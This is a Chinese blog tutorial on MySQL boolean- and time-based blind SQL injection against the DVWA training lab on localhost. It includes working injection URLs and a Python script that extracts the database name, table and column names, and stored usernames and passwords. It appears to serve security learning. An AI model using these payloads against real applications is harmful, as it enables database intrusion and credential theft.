mysql盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量1.1k 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014578907/article/details/90384018
版权

title: mysql盲注
comments: false
date: 2016-05-27 13:21:58
categories: 安全
tags: [Web安全,SQL注入,Python]

dvwa-mysql盲注

一、盲注SQL基础

函数

mysql中有几个函数可以用来进行盲注。包括 sleep(),ascii(),substring(),length(),if()等。其中:
sleep(): 指定秒数来运行语句
ascii() 返回ASCII码
substring() 截取字符串长度
用法:SubString(string, int, int)
返回第一个参数中从第二个参数指定的位置开始、第三个参数指定的长度的子字符串
length() 返回字符串长度
if() IF(Condition,A,B) 意义:当Condition为TRUE时,返回A;当Condition为FALSE时,返回B

例如:
在mysql中分别运行
select sleep(5);
会出现5秒延迟。

select if(1,sleep(5),1)
如果为真,就延时5秒,否则返回1
查询当前数据库长度
select length(database());

截取当前数据库第一个字符
select substring(database(),1,1);

当前数据库第一个字符的ascii码
select ascii(substring(database(),1,1));

对dvwa进行盲注,由于盲注没有提示,只能根据页面返回错误与否进行判断。

如何判断长度:

select length(database())>1;
返回1,代表正确

select length(database())>2;
同样正确,继续增加。
查询select length(database())>4;

返回0,代表错误。即长度不大于4
再查询select length(database())=4;

返回1,代表正确,所以当前数据库长度为4

如何查询内容

select ascii(substring(database(),1,1))>2
返回正确,即当前数据库第一个字符的ascii大于2,在这里可以使用二分法,最终
select ascii(substring(database(),1,1))=100,返回正确。即当前数据库第一个字符ascii为100,也就是d
以此类推,select ascii(substring(database(),2,1))=118可以得到所以数据库所以内容。

dvwa中sql盲注语句:

首先判断长度。
http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and length(database())>1-- &Submit=Submit#

返回

继续增大数字,最终得到
http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and length(database())=4-- &Submit=Submit#
返回正确,同上,查询内容
http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and ascii(substring( database(),1,1))=100-- &Submit=Submit#

得到第一个字符,以此类推,可以得到当前数据库名称。

二、利用python脚本

前面手工的过程太过繁琐,可以利用python脚本来辅助。
这里写了个简单的python脚本。利用前面的dvwa模拟登录脚本免登录
查询长度,使用循环判断

def get_len(input_str):
    for i in range(1, 20):
        payload = "' and length(%s)=%d-- " % (input_str, i)
        url = "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1%s&Submit=Submit#" % payload
        html = sql_get.get(url)
        if (html.text.find("User ID exists in the database") != -1):
            # print("长度=", i)
            return i

在这里input_str为查询的内容,如database(),user()等

查询字符ascii,这里使用二分法进行查找

def get_ascii(min_num, max_num, input_str, i, url):
    mid_num = int((min_num + max_num) / 2)
    payload = "' and ascii(substring(%s, %d, 1)) > %d-- " % (input_str, i, mid_num)
    url = "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1%s&Submit=Submit#" % payload
    # print(url)
    html = sql_get.get(url)
    if (max_num - min_num) == 1:
        if (html.text.find("User ID exists in the database") != -1):
            return max_num
        else:
            return min_num
    if (html.text.find("User ID exists in the database") != -1):

        min_num = mid_num
        return get_ascii(min_num, max_num, input_str, i, url)

    else:
        max_num = mid_num
        return get_ascii(min_num, max_num, input_str, i, url)

得到内容,这里调用get_ascii函数,根据长度循环

def get_cont(input_str, the_get_len):
    max_num = 127
    min_num = 33
    mid_num = 1
    ascii_cont = ""
    for i in range(1, the_get_len + 1):
        payload = "' and ascii(substring(%s, %d, 1)) > %d-- " % (input_str, i, mid_num)
        url = "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1%s&Submit=Submit#" % payload
        temp_ascii = get_ascii(min_num, max_num, input_str, i, url)
        temp_ascii = chr(temp_ascii)
        ascii_cont += temp_ascii

    return ascii_cont

主函数为

def main():
    input_str = input("输入:")
    the_get_len = get_len(input_str)
    print(input_str, '长度=', the_get_len)
    ascii_cont = get_cont(input_str, the_get_len)
    print("内容:", ascii_cont)

三、查询表的内容

如何查到表的内容,由于mysql是支持嵌套查询的,可以利用嵌套查询得到内容。这里可以参考普通注入的语句。
在mysql中查询
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x64767761
可以得到dvwa数据库的所有的表名。

select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x64767761 limit 0,1;可以得到dvwa数据库的第一行表名。
所以在盲注中可以这样查询:

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and ascii(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x64767761 limit 0,1),1, 1))=103--
&Submit=Submit#

得到第一个字符,即g;
然后同上,可以依次得到表名。

得到表名后,查询字段名称。
在mysql中查询
select column_name from information_schema.columns where table_name=0x7573657273
得到user表中所以字段名。

所以在盲注中可以这样查询:

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and ascii(substring((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1, 1))>x--
&Submit=Submit#

依次类推,可以得到所有字段;
得到字段后,查询内容
在mysql中查询
select user from users,得到user字段的内容
select password from users,得到password字段的内容

所以在盲注中可以这样查询:

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and ascii(substring((select user from users limit 0,1),1, 1))>x--
&Submit=Submit#

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and ascii(substring((select password from users limit 0,1),1, 1))>x--
&Submit=Submit#

依次得到user和password的内容。

除了这种方式外,也可以使用sleep函数。
例如,查询长度。

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and if(length(database())=4,sleep(5),1)-- &Submit=Submit#

查询内容

http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1' and if(ascii(substring( database(),1,1))=100,sleep(5),1)-- &Submit=Submit#

同理,也可以查询其它的内容。

事实上,一般可以使用sqlmap进行盲注查询。

seeicb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
MySQL盲注
leshi182的博客
02-22 513
一、基于时间延时的盲注:SLEEP 函数 SLEEP( 数字) 函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。) 例如: Select * from 表名 where id=1 and sleep(2); 1 有这个id=1的内容延迟2秒执行,没有则相反。 二、配合if条件触发 IF(expr1, expr2, expr3) 如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其
SQL 布尔盲注
qq_42378173的博客
10-11 1255
SQL 布尔盲注
sql注入之盲注
最新发布
weixin_64815500的博客
06-19 991
sql注入关于无回显用到的盲注,sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
mysql注入之盲注语句汇总
sirius的博客
08-28 3726
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
mysql盲注总结
z7sz的博客
06-21 1132
本文的内容主要是对mysql盲注的总结
Mysql盲注总结
b1ackc4t的博客
01-24 2914
Mysql盲注 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行盲注 手工盲注的基本步骤 判断是否存在注入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种盲注 基于报错的盲注 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
Web应用安全:Mysql盲注文本.docx
06-17
MySQL盲注】是Web应用安全领域中一种重要的SQL注入技术。当攻击者无法直接从网页上获取数据库的反馈信息时,他们会通过一系列的探测和判断来获取敏感数据。盲注主要分为三种类型:基于布尔的SQL盲注、基于时间的...
Web应用安全:Mysql盲注实验).docx
06-17
Web应用安全领域中,MySQL盲注是一种常见的攻击手段,它主要针对存在SQL注入漏洞的Web应用程序。本实验的目的是让参与者了解并实践MySQL盲注,从而掌握如何利用这种技术获取数据库中的敏感信息,如账号和密码。 在...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL 高级盲注:布尔型盲注详解】 MySQL盲注,特别是布尔型盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注...
sql注入知识---时间盲注
尘玥的故事
04-18 604
原理:在SQL注入过程中,无论注入是否成功,页面完全没有变化。此时只能通过使用数据库的延时函数来判断注入点一般采用响应时间上的差异来判断是否存在SQL注入,即基于时间型的SQL盲注。第二个语句:语句最后加上and 1=2 形成查询逻辑错误,sleep函数不执行暂停,因此查询时间为0s。第一个语句:sleep函数设置查询停留3s, sleep函数本身返回值为0,显示查询时间为3s。SQL CASE 表达试是一种通用的条件表达试,类似其他语言的 if/else语句。除了Sleep之外的延迟。
MYSQL——时间盲注BENCHMARK()
m0_51330619的博客
09-20 3264
先上图看效果 1' union select 1,BENCHMARK(500000000,(select user from users limit 0,1))# 可见benchmark()函数是可以造成延时的。 简介: 它是MySQL的一个内置函数,用于测试函数或者表达式的执行速度。 其运行返回值都是0,仅仅会执行显示时间。 用法:benchmark(重复次数, 执行的函数) 例如:将select database()执行100000000次,显示耗时0.52sec SELECT BENCHMARK(
sql注入知识---布尔型盲注
尘玥的故事
04-08 559
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
SQL注入原理-时间盲注
T1ngSh0w的博客
09-16 3446
SQL注入原理-时间盲注+手写python脚本
sql注入(时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 544
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
mysql 盲注查询语句_SQL注入学习笔记——盲注
weixin_42498641的博客
02-18 2432
概念:如果每个应用程序都能按照我们输入的 SQL 命令返回我们需要的数据,那应用程序就无安全性可言了!为此,程序设计者们想到一个办法,那就是无论输入何种命令,只要 SQL 语句导致数据库产生错误,那么应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,回显方式的 SQL 注入办法就无法使用了。盲注,即在 SQL 注入过程中,SQL 语句执行选择后,选择的数据不能回...
HFCTF Writeup:MySQL盲注与Nginx缓存文件Include
* MySQL 8.x版本中,regexp不能用于时间盲注,这可能是由于MySQL 8.x版本中regexp的实现机制所致。 * 可以使用`COLLATE utf8mb4_bin`来区分大小写,实现盲注攻击。 * 在MySQL中,可以使用`@tmp:=`来实现时间盲注攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值